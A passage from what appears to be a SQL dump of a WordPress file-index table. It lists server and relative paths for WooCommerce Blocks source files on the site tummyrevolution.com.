blocks/assets/js/editor-components/product-control/style.scss'),(9540,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/woocommerce/packages/woocommerce-blocks/assets/js/editor-components/product-orderby-control/index.tsx','wp-content/plugins/woocommerce/packages/woocommerce-blocks/assets/js/editor-components/product-orderby-control/index.tsx'),(9541,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/woocommerce/packages/woocommerce-blocks/assets/js/editor-components/product-orderby-control/types.ts','wp-content/plugins/woocommerce/packages/woocommerce-blocks/assets/js/editor-components/product-orderby-control/types.ts'),(9542,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/woocommerce/packages/woocommerce-blocks/assets/js/editor-components/product-stock-control/index.tsx','wp-content/plugins/woocommerce/packages/woocommerce-blocks/assets/js/editor-components/product-stock-control/index.tsx'),(9543,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/woocommerce/packages/woocommerce-blocks/assets/js/editor-components/product-tag-control/index.tsx','wp-content/plugins/woocommerce/packages/woocommerce-blocks/assets/js/editor-components/product-tag-control/index.tsx'),(9544,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/woocommerce/packages/woocommerce-blocks/assets/js/editor-components/product-tag-control/product-tag-item.tsx','wp-content/plugins/woocommerce/packages/woocommerce-blocks/assets/js/editor-components/product-tag-control/product-tag-item.tsx'),(9545,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/woocommerce/packages/woocommerce-blocks/assets/js/editor-components/product-tag-control/style.scss','wp-content/plugins/woocommerce/packages/woocommerce-blocks/assets/js/editor-components/product-tag-control/style.scss'),(9546,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/woocommerce/packages/woocommerce-blocks/assets/js/editor-components/product-tag-control/types.ts','wp-content/plugins/woocommerce/packages/woocommerce-blocks/assets/js/editor-components/product-tag-control/types.ts'),(9547,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/woocommerce/packages/woocommerce-blocks/assets/js/editor-components/products-control/index.js','wp-content/plugins/woocommerce/packages/woocommerce-blocks/assets/js/editor-components/products-control/index.js'),(9548,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/woocommerce/packages/woocommerce-blocks/assets/js/editor-components/search-list-control/index.ts','wp-content/plugins/woocommerce/packages/woocommerce-blocks/assets/js/editor-components/search-list-control/index.ts'),(9549,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/woocommerce/packages/woocommerce-blocks/assets/js/editor-components/search-list-control/item.tsx','wp-content/plugins/woocommerce/packages/woocommerce-blocks/assets/js/editor-components/search-list-control/item.tsx'),(9550,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/woocommerce/packages/woocommerce-blocks/assets/js/editor-components/search-list-control/search-list-control.tsx','wp-content/plugins/woocommerce/packages/woocommerce-blocks/assets/js/editor-components/search-list-control/search-list-control.tsx'),(9551,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/woocommerce/packages/woocommerce-blocks/assets/js/editor-components/search-list-control/style.scss','wp-content/plugins/woocommerce/packages/woocommerce-blocks/assets/js/editor-components/search-list-control/style.scss'),(9552,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/woocommerce/packages/woocommerce-blocks/assets/js/editor-components/search-list-control/test/__snapshots__/index.js.snap','wp-content/plugins/woocommerce/packages/woocommerce-blocks/assets/js/editor-components/search-list-control/test/__snapshots__/index.js.snap'),(9553,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/woocommerce/packages/woocommerce-blocks/assets/js/editor-components/search-list-control/test/hierarchy.js','wp-content/plugins/woocommerce/packages/woocommerce-blocks/assets/js/editor-components/search-list-control/test/hierarchy.js'),(9554,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/woocommerce/packages/woocommerce-blocks/assets/js/editor-components/search-list-control/test/index.js','wp-content/plugins/woocommerce/packages/woocommerce-blocks/assets/js/editor-components/search-list-control/test/index.js'),(9555,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/woocommerce/packages/woocommerce-blocks/assets/js/editor-components/search-list-control/types.ts','wp-content/plugins/woocommerce/packages/woocommerce-blocks/assets/js/editor-components/search-list-control/types.ts'),(9556,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/woocommerce/packages/woocommerce-blocks/assets/js/editor-components/search-list-control/utils.tsx','wp-content/plugins/woocommerce/packages/woocommerce-blocks/assets/js/editor-components/search-list-control/utils.tsx'),(9557,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/woocommerce/packages/woocommerce-blocks/assets/js/editor-components/sidebar-compatibility-notice/editor.scss','wp-content/plugins/woocommerce/packages/woocommerce-blocks/assets/js/editor-components/sidebar-compatibility-notice/editor.scss'),(9558,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/woocommerce/packages/woocommerce-blocks/assets/js/editor-components/sidebar-compatibility-notice/index.tsx','wp-content/plugins/woocommerce/packages/woocommerce-blocks/assets/js/editor-components/sidebar-compatibility-notice/index.tsx'),(9559,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/woocommerce/packages/woocommerce-blocks/assets/js/editor-components/sidebar-compatibility-notice/use-compatibility-notice.ts','wp-content/plugins/woocommerce/packages/woocommerce-blocks/assets/js/editor-components/sidebar-compatibility-notice/use-compatibility-notice.ts'),(9560,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/woocommerce/packages/woocommerce-blocks/assets/js/editor-components/tag/editor.scss','wp-content/plugins/woocommerce/packages/woocommerce-blocks/assets/js/editor-components/tag/editor.scss'),(9561,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/woocommerce/packages/woocommerce-blocks/assets/js/editor-components/tag/index.tsx','wp-content/plugins/woocommerce/packages/woocommerce-blocks/assets/js/editor-components/tag/index.tsx'),(9562,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/woocommerce/packages/woocommerce-blocks/assets/js/editor-components/tag/test/__snapshots__/index.js.snap','wp-content/plugins/woocommerce/packages/woocommerce-blocks/assets/js/editor-components/tag/test/__snapshots__/index.js.snap'),(9563,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/woocommerce/packages/woocommerce-blocks/assets/js/editor-components/tag/test/index.js','wp-content/plugins/woocommerce/packages/woocommerce-blocks/assets/js/editor-components/tag/test/index.js'),(9564,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/woocommerce/packages/woocommerce-blocks/assets/js/editor-components/template-notice/editor.scss','wp-content/plugins/woocommerce/packages/woocommerce-blocks/assets/js/editor-components/template-notice/editor.scss'),(9565,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/woocommerce/packages/woocommerce-blocks/assets/js/editor-components/template-notice/index.tsx','wp-content/plugins/woocommerce/packages/woocommerce-blocks/assets/js/editor-components/template-notice/index.tsx'),(9566,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/woocommerce/packages/woocommerce-blocks/assets/js/editor-components/text-toolbar-button/index.js','wp-content/plugins/woocommerce/packages/woocommerce-blocks/assets/js/editor-components/text-toolbar-button/index.js'),(9567,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/woocommerce/packages/woocommerce-blocks/assets/js/editor-components/text-toolbar-button/style.scss','wp-content/plugins/woocommerce/packages/woocommerce-blocks/assets/js/editor-components/text-toolbar-button/style.scss'),(9568,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/woocommerce/packages/woocommerce-blocks/assets/js/editor-components/utils/index.js','wp-content/plugins/woocommerce/packages/woocommerce-blocks/assets/js/editor-components/utils/index.js'),(9569,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/woocommerce/packages/woocommerce-blocks/assets/js/extensions/google-analytics/constants.ts','wp-content/plugins/woocommerce/packages/woocommerce-blocks/assets/js/extensions/google-analytics/constants.ts'),(9570,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/woocommerce/packages/woocommerce-blocks/assets/js/extensions/google-analytics/index.ts','wp-content/plugins/woocommerce/packages/woocommerce-blocks/assets/js/extensions/google-analytics/index.ts'),(9571,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/woocommerce/packages/woocommerce-blocks/assets/js/extensions/google-analytics/utils.ts','wp-content/plugins/woocommerce/packages/woocommerce-blocks/assets/js/extensions/google-analytics/utils.ts'),(9572,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/woocommerce/packages/woocommerce-blocks/assets/js/extensions/payment-methods/bacs/constants.js','wp-content/plugins/woocommerce/packages/woocommerce-blocks/assets/js/extensions/payment-methods/bacs/constants.js'),(9573,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/woocommerce/packages/woocommerce-blocks/assets/js/extensions/payment-methods/bacs/index.js','wp-content/plugins/woocommerce/packages/woocommerce-blocks/assets/js/extensions/payment-methods/bacs/index.js'),(9574,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/woocommerce/packages/woocommerce-blocks/assets/js/extensions/payment-methods/cheque/constants.js','wp-content/plugins/woocommerce/packages/woocommerce-blocks/assets/js/extensions/payment-methods/cheque/constants.js'),(9575,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/woocommerce/packages/woocommerce-blocks/assets/js/extensions/payment-methods/cheque/index.js','wp-content/plugins/woocommerce/packages/woocommerce-blocks/assets/js/extensions/payment-methods/cheque/index.js'),(9576,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/woocommerce/packages/woocommerce-blocks/assets/js/extensions/payment-methods/cod/constants.js','wp-content/plugins/woocommerce/packages/woocommerce-blocks/assets/js/extensions/payment-methods/cod/constants.js'),(9577,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/woocommerce/packages/woocommerce-blocks/assets/js/extensions/payment-methods/cod/index.js','wp-content/plugins/woocommerce/packages/woocommerce-blocks/assets/js/extensions/payment-methods/cod/index.js'),(9578,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/woocommerce/packages/woocommerce-blocks/assets/js/extensions/payment-methods/paypal/constants.js','wp-content/plugins/woocommerce/packages/woocommerce-blocks/assets/js/extensions/payment-methods/paypal/constants.js'),(9579,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/woocommerce/packages/woocommerce-blocks/assets/js/extensions/payment-methods/paypal/index.js','wp-content/plugins/woocommerce/packages/woocommerce-blocks/assets/js/extensions/payment-methods/paypal/index.js'),(9580,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/woocommerce/packages/woocommerce-blocks/assets/js/extensions/shipping-methods/pickup-location/edit-location/form.tsx','wp-content/plugins/woocommerce/packages/woocommerce-blocks/assets/js/extensions/shipping-methods/pickup-location/edit-location/form.tsx'),(9581,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/woocommerce/packages/woocommerce-blocks/assets/js/extensions/shipping-methods/pickup-location/edit-location/index.tsx','wp-content/plugins/woocommerce/packages/woocommerce-blocks/assets/js/extensions/shipping-methods/pickup-location/edit-location/index.tsx'),(9582,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/woocommerce/packages/woocommerce-blocks/assets/js/extensions/shipping-methods/pickup-location/general-settings.tsx','wp-content/plugins/woocommerce/packages/woocommerce-blocks/assets/js/extensions/shipping-methods/pickup-location/general-settings.tsx'),(9583,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/woocommerce/packages/woocommerce-blocks/assets/js/extensions/shipping-methods/pickup-location/index.js','wp-content/plugins/woocommerce/packages/woocommerce-blocks/assets/js/extensions/shipping-methods/pickup-location/index.js'),(9584,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/woocommerce/packages/woocommerce-blocks/assets/js/extensions/shipping-methods/pickup-location/location-settings.tsx','wp-content/plugins/woocommerce/packages/woocommerce-blocks/assets/js/extensions/shipping-methods/pickup-location/location-settings.tsx'),(9585,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/woocommerce/packages/woocommerce-blocks/assets/js/extensions/shipping-methods/pickup-location/save.tsx','wp-content/plugins/woocommerce/packages/woocommerce-blocks/assets/js/extensions/shipping-methods/pickup-location/save.tsx'),(9586,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/woocommerce/packages/woocommerce-blocks/assets/js/extensions/shipping-methods/pickup-location/settings-context.tsx','wp-content/plugins/woocommerce/packages/woocommerce-blocks/assets/js/extensions/shipping-methods/pickup-location/settings-context.tsx'),(9587,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/woocommerce/packages/woocommerce-blocks/assets/js/extensions/shipping-methods/pickup-location/settings-page.tsx','wp-content/plugins/woocommerce/packages/woocommerce-blocks/assets/js/extensions/shipping-methods/pickup-location/settings-page.tsx'),(9588,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/woocommerce/packages/woocommerce-blocks/assets/js/extensions/shipping-methods/pickup-location/types.ts','wp-content/plugins/woocommerce/packages/woocommerce-blocks/assets/js/extensions/shipping-methods/pickup-location/types.ts'),(9589,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/woocommerce/packages/woocommerce-blocks/assets/js/extensions/shipping-methods/pickup-location/utils.ts','wp-content/plugins/woocommerce/packages/woocommerce-blocks/assets/js/extensions/shipping-methods/pickup-location/utils.ts'),(9590,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/woocommerce/packages/woocommerce-blocks/assets/js/extensions/shipping-methods/shared-components/index.ts','wp-content/plugins/woocommerce/packages/woocommerce-blocks/assets/js/extensions/shipping-methods/shared-components/index.ts'),(9591,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/woocommerce/packages/woocommerce-blocks/assets/js/extensions/shipping-methods/shared-components/settings-card/index.tsx','wp-content/plugins/woocommerce/packages/woocommerce-blocks/assets/js/extensions/shipping-methods/shared-components/settings-card/index.tsx'),(9592,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/woocommerce/packages/woocommerce-blocks/assets/js/extensions/shipping-methods/shared-components/settings-modal/index.tsx','wp-content/plugins/woocommerce/packages/woocommerce-blocks/assets/js/extensions/shipping-methods/shared-components/settings-modal/index.tsx'),(9593,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/woocommerce/packages/woocommerce-blocks/assets/js/extensions/shipping-methods/shared-components/settings-section/index.tsx','wp-content/plugins/woocommerce/packages/woocommerce-blocks/assets/js/extensions/shipping-methods/shared-components/settings-section/index.tsx'),(9594,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/woocommerce/packages/woocommerce-blocks/assets/js/extensions/shipping-methods/shared-components/sortable-table/index.tsx','wp-content/plugins/woocommerce/packages/woocommerce-blocks/assets/js/extensions/shipping-methods/shared-components/sortable-table/index.tsx'),(9595,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/woocommerce/packages/woocommerce-blocks/assets/js/filters/block-list-block.js','wp-content/plugins/woocommerce/packages/woocommerce-blocks/assets/js/filters/block-list-block.js'),(9596,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/woocommerce/packages/woocommerce-blocks/assets/js/filters/exclude-draft-status-from-analytics.js','wp-content/plugins/woocommerce/packages/woocommerce-blocks/assets/js/filters/exclude-draft-status-from-analytics.js'),(9597,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/woocommerce/packages/woocommerce-blocks/assets/js/filters/get-block-attributes.js','wp-content/plugins/woocommerce/packages/woocommerce-blocks/assets/js/filters/get-block-attributes.js'),(9598,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/woocommerce/packages/woocommerce-blocks/assets/js/global.d.ts','wp-content/plugins/woocommerce/packages/woocommerce-blocks/assets/js/global.d.ts'),(9599,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/woocommerce/packages/woocommerce-blocks/assets/js/hocs/index.js','wp-content/plugins/woocommerce/packages/woocommerce-blocks/assets/js/hocs/index.js'),(9600,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/woocommerce/packages/woocommerce-blocks/assets/js/hocs/test/with-categories.js','wp-content/plugins/woocommerce/packages/woocommerce-blocks/assets/js/hocs/test/with-categories.js'),(9601,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/woocommerce/packages/woocommerce-blocks/assets/js/hocs/test/with-category.js','wp-content/plugins/woocommerce/packages/woocommerce-blocks/assets/js/hocs/test/with-category.js'),(9602,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/woocommerce/packages/woocommerce-blocks/assets/js/hocs/test/with-product-variations.js','wp-content/plugins/woocommerce/packages/woocommerce-blocks/assets/js/hocs/test/with-product-variations.js'),(9603,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/woocommerce/packages/woocommerce-blocks/assets/js/hocs/test/with-product.js','wp-content/plugins/woocommerce/packages/woocommerce-blocks/assets/js/hocs/test/with-product.js'),(9604,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/woocommerce/packages/woocommerce-blocks/assets/js/hocs/test/with-searched-products.js','wp-content/plugins/woocommerce/packages/woocommerce-blocks/assets/js/hocs/test/with-searched-products.js'),(9605,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/woocommerce/packages/woocommerce-blocks/assets/js/hocs/test/with-transform-single-select-to-multiple-select.js','wp-content/plugins/woocommerce/packages/woocommerce-blocks/assets/js/hocs/test/with-transform-single-select-to-multiple-select.js'),(9606,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/woocommerce/packages/woocommerce-blocks/assets/js/hocs/with-attributes.js','wp-content/plugins/woocommerce/packages/woocommerce-blocks/assets/js/hocs/with-attributes.js'),(9607,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/woocommerce/packages/woocommerce-blocks/assets/js/hocs/with-categories.js','wp-content/plugins/woocommerce/packages/woocommerce-blocks/assets/js/hocs/with-categories.js'),(9608,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/woocommerce/packages/woocommerce-blocks/assets/js/hocs/with-category.js','wp-content/plugins/woocommerce/packages/woocommerce-blocks/assets/js/hocs/with-category.js'),(9609,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/woocommerce/packages/woocommerce-blocks/assets/js/hocs/with-product-variations.js','wp-content/plugins/woocommerce/packages/woocommerce-blocks/assets/js/hocs/with-product-variations.js'),(9610,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/woocommerce/packages/woocommerce-blocks/assets/js/hocs/with-product.js','wp-content/plugins/woocommerce/packages/woocommerce-blocks/assets/js/hocs/with-product.js'),(9611,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/woocommerce/packages/woocommerce-blocks/assets/js/hocs/with-searched-products.tsx','wp-content/plugins/woocommerce/packages/woocommerce-blocks/assets/js/hocs/with-searched-products.tsx'),(9612,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/woocommerce/packages/woocommerce-blocks/assets/js/hocs/with-transform-single-select-to-multiple-select.tsx','wp-content/plugins/woocommerce/packages/woocommerce-blocks/assets/js/hocs/with-transform-single-select-to-multiple-select.tsx'),(9613,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/woocommerce/packages/woocommerce-blocks/assets/js/icons/index.js','wp-content/plugins/woocommerce/packages/woocommerce-blocks/assets/js/icons/index.js'),(9614,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/woocommerce/packages/woocommerce-blocks/assets/js/icons/library/alert.tsx','wp-content/plugins/woocommerce/packages/woocommerce-blocks/assets/js/icons/library/alert.tsx'),(9615,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/woocommerce/packages/woocommerce-blocks/assets/js/icons/library/bag-alt.tsx','wp-content/plugins/woocommerce/packages/woocommerce-blocks/assets/js/icons/library/bag-alt.tsx'),(9616,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/woocommerce/packages/woocommerce-blocks/assets/js/icons/library/bag.tsx','wp-content/plugins/woocommerce/packages/woocommerce-blocks/assets/js/icons/library/bag.tsx'),(9617,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/woocommerce/packages/woocommerce-blocks/assets/js/icons/library/barcode.tsx','wp-content/plugins/woocommerce/packages/woocommerce-blocks/assets/js/icons/library/barcode.tsx'),(9618,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/woocommerce/packages/woocommerce-blocks/assets/js/icons/library/cart-outline.tsx','wp-content/plugins/woocommerce/packages/woocommerce-blocks/assets/js/icons/library/cart-outline.tsx'),(9619,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/woocommerce/packages/woocommerce-blocks/assets/js/icons/library/cart.tsx','wp-content/plugins/woocommerce/packages/woocommerce-blocks/assets/js/icons/library/cart.tsx'),(9620,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/woocommerce/packages/woocommerce-blocks/assets/js/icons/library/check-payment.tsx','wp-content/plugins/woocommerce/packages/woocommerce-blocks/assets/js/icons/library/check-payment.tsx'),(9621,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/woocommerce/packages/woocommerce-blocks/assets/js/icons/library/customer-account-style-alt.tsx','wp-content/plugins/woocommerce/packages/woocommerce-blocks/assets/js/icons/library/customer-account-style-alt.tsx'),(9622,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/woocommerce/packages/woocommerce-blocks/assets/js/icons/library/customer-account-style.tsx','wp-content/plugins/woocommerce/packages/woocommerce-blocks/assets/js/icons/library/customer-account-style.tsx'),(9623,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/woocommerce/packages/woocommerce-blocks/assets/js/icons/library/customer-account.tsx','wp-content/plugins/woocommerce/packages/woocommerce-blocks/assets/js/icons/library/customer-account.tsx'),(9624,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/woocommerce/packages/woocommerce-blocks/assets/js/icons/library/eye.tsx','wp-content/plugins/woocommerce/packages/woocommerce-blocks/assets/js/icons/library/eye.tsx'),(9625,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/woocommerce/packages/woocommerce-blocks/assets/js/icons/library/fields.tsx','wp-content/plugins/woocommerce/packages/woocommerce-blocks/assets/js/icons/library/fields.tsx'),(9626,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/woocommerce/packages/woocommerce-blocks/assets/js/icons/library/filled-cart.tsx','wp-content/plugins/woocommerce/packages/woocommerce-blocks/assets/js/icons/library/filled-cart.tsx'),(9627,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/woocommerce/packages/woocommerce-blocks/assets/js/icons/library/folder-starred.tsx','wp-content/plugins/woocommerce/packages/woocommerce-blocks/assets/js/icons/library/folder-starred.tsx'),(9628,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/woocommerce/packages/woocommerce-blocks/assets/js/icons/library/mini-cart-alt.tsx','wp-content/plugins/woocommerce/packages/woocommerce-blocks/assets/js/icons/library/mini-cart-alt.tsx'),(9629,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/woocommerce/packages/woocommerce-blocks/assets/js/icons/library/mini-cart.tsx','wp-content/plugins/woocommerce/packages/woocommerce-blocks/assets/js/icons/library/mini-cart.tsx'),(9630,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/woocommerce/packages/woocommerce-blocks/assets/js/icons/library/product-details.tsx','wp-content/plugins/woocommerce/packages/woocommerce-blocks/assets/js/icons/library/product-details.tsx'),(9631,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/woocommerce/packages/woocommerce-blocks/assets/js/icons/library/product-meta.tsx','wp-content/plugins/woocommerce/packages/woocommerce-blocks/assets/js/icons/library/product-meta.tsx'),(9632,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/woocommerce/packages/woocommerce-blocks/assets/js/icons/library/remove-cart.tsx','wp-content/plugins/woocommerce/packages/woocommerce-blocks/assets/js/icons/library/remove-cart.tsx'),(9633,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/woocommerce/packages/woocommerce-blocks/assets/js/icons/library/stacks.tsx','wp-content/plugins/woocommerce/packages/woocommerce-blocks/assets/js/icons/library/stacks.tsx'),(9634,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/woocommerce/packages/woocommerce-blocks/assets/js/icons/library/thumb-up.tsx','wp-content/plugins/woocommerce/packages/woocommerce-blocks/assets/js/icons/library/thumb-up.tsx'),(9635,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/woocommerce/packages/woocommerce-blocks/assets/js/icons/library/thumbnails-position-bottom.tsx','wp-content/plugins/woocommerce/packages/woocommerce-blocks/assets/js/icons/library/thumbnails-position-bottom.tsx'),(9636,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/woocommerce/packages/woocommerce-blocks/assets/js/icons/library/thumbnails-position-left.tsx','wp-content/plugins/woocommerce/packages/woocommerce-blocks/assets/js/icons/library/thumbnails-position-left.tsx'),(9637,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/woocommerce/packages/woocommerce-blocks/assets/js/icons/library/thumbnails-position-right.tsx','wp-content/plugins/woocommerce/packages/woocommerce-blocks/assets/js/icons/library/thumbnails-position-right.tsx'),(9638,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/woocommerce/packages/woocommerce-blocks/assets/js/icons/library/toggle.tsx','wp-content/plugins/woocommerce/packages/woocommerce-blocks/assets/js/icons/library/toggle.tsx'),(9639,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/woocommerce/packages/woocommerce-blocks/assets/js/icons/library/totals.tsx','wp-content/plugins/woocommerce/packages/woocommerce-blocks/assets/js/icons/library/totals.tsx'),(9640,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/woocommerce/packages/woocommerce-blocks/assets/js/icons/library/woo.tsx','wp-content/plugins/woocommerce/packages/woocommerce-blocks/assets/js/icons/library/woo.tsx'),(9641,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/woocommerce/packages/woocommerce-blocks/assets/js/icons/stories/index.tsx','wp-content/plugins/woocommerce/packages/woocommerce-blocks/assets/js/icons/stories/index.tsx'),(9642,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/woocommerce/packages/woocommerce-blocks/assets/js/index.js','wp-content/plugins/woocommerce/packages/woocommerce-blocks/assets/js/index.js'),(9643,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/woocommerce/packages/woocommerce-blocks/assets/js/interactivity/constants.js','wp-content/plugins/woocommerce/packages/woocommerce-blocks/assets/js/interactivity/constants.js'),(9644,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/woocommerce/packages/woocommerce-blocks/assets/js/interactivity/directives.js','wp-content/plugins/woocommerce/packages/woocommerce-blocks/assets/js/interactivity/directives.js'),(9645,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/woocommerce/packages/woocommerce-blocks/assets/js/interactivity/hooks.js','wp-content/plugins/woocommerce/packages/woocommerce-blocks/assets/js/interactivity/hooks.js'),(9646,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/woocommerce/packages/woocommerce-blocks/assets/js/interactivity/index.js','wp-content/plugins/woocommerce/packages/woocommerce-blocks/assets/js/interactivity/index.js'),(9647,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/woocommerce/packages/woocommerce-blocks/assets/js/interactivity/router.js','wp-content/plugins/woocommerce/packages/woocommerce-blocks/assets/js/interactivity/router.js'),(9648,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/woocommerce/packages/woocommerce-blocks/assets/js/interactivity/store.js','wp-content/plugins/woocommerce/packages/woocommerce-blocks/assets/js/interactivity/store.js'),(9649,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/woocommerce/packages/woocommerce-blocks/assets/js/interactivity/utils.js','wp-content/plugins/woocommerce/packages/woocommerce-blocks/assets/js/interactivity/utils.js'),(9650,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/woocommerce/packages/woocommerce-blocks/assets/js/interactivity/vdom.js','wp-content/plugins/woocommerce/packages/woocommerce-blocks/assets/js/interactivity/vdom.js'),(9651,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/woocommerce/packages/woocommerce-blocks/assets/js/middleware/index.js','wp-content/plugins/woocommerce/packages/woocommerce-blocks/assets/js/middleware/index.js'),(9652,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/woocommerce/packages/woocommerce-blocks/assets/js/middleware/store-api-nonce.js','wp-content/plugins/woocommerce/packages/woocommerce-blocks/assets/js/middleware/store-api-nonce.js'),(9653,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/woocommerce/packages/woocommerce-blocks/assets/js/previews/cart.ts','wp-content/plugins/woocommerce/packages/woocommerce-blocks/assets/js/previews/cart.ts'),(9654,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/woocommerce/packages/woocommerce-blocks/assets/js/previews/categories.js','wp-content/plugins/woocommerce/packages/woocommerce-blocks/assets/js/previews/categories.js'),(9655,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/woocommerce/packages/woocommerce-blocks/assets/js/previews/grid-block.js','wp-content/plugins/woocommerce/packages/woocommerce-blocks/assets/js/previews/grid-block.js'),(9656,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/woocommerce/packages/woocommerce-blocks/assets/js/previews/index.js','wp-content/plugins/woocommerce/packages/woocommerce-blocks/assets/js/previews/index.js'),(9657,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/woocommerce/packages/woocommerce-blocks/assets/js/previews/products.js','wp-content/plugins/woocommerce/packages/woocommerce-blocks/assets/js/previews/products.js'),(9658,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/woocommerce/packages/woocommerce-blocks/assets/js/previews/reviews.js','wp-content/plugins/woocommerce/packages/woocommerce-blocks/assets/js/previews/reviews.js'),(9659,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/woocommerce/packages/woocommerce-blocks/assets/js/previews/saved-payment-methods.js','wp-content/plugins/woocommerce/packages/woocommerce-blocks/assets/js/previews/saved-payment-methods.js'),(9660,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/woocommerce/packages/woocommerce-blocks/assets/js/previews/shipping-rates.ts','wp-content/plugins/woocommerce/packages/woocommerce-blocks/assets/js/previews/shipping-rates.ts'),(9661,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/woocommerce/packages/woocommerce-blocks/assets/js/